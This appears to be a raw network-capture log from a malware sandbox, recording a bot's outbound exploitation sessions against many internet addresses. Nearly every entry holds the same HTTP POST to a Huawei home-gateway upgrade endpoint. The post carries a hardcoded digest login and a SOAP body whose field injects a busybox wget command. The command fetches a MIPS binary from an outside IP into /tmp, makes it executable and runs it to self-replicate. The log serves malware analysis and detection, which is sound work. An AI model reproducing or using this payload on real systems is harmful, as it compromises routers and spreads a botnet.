                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.145536631.226.75.15237215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.827208996 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.1447294186.23.77.12237215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.827208996 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.1445738197.48.133.15937215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.828883886 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.1457716197.164.23.337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.828883886 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.1437594197.209.199.1637215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.828883886 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.1445392157.233.53.19037215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                119192.168.2.1454612197.152.207.2137215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.1447806157.183.5.14637215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.143280494.44.111.3437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.1449252157.148.29.8037215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.1451272157.194.67.14237215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
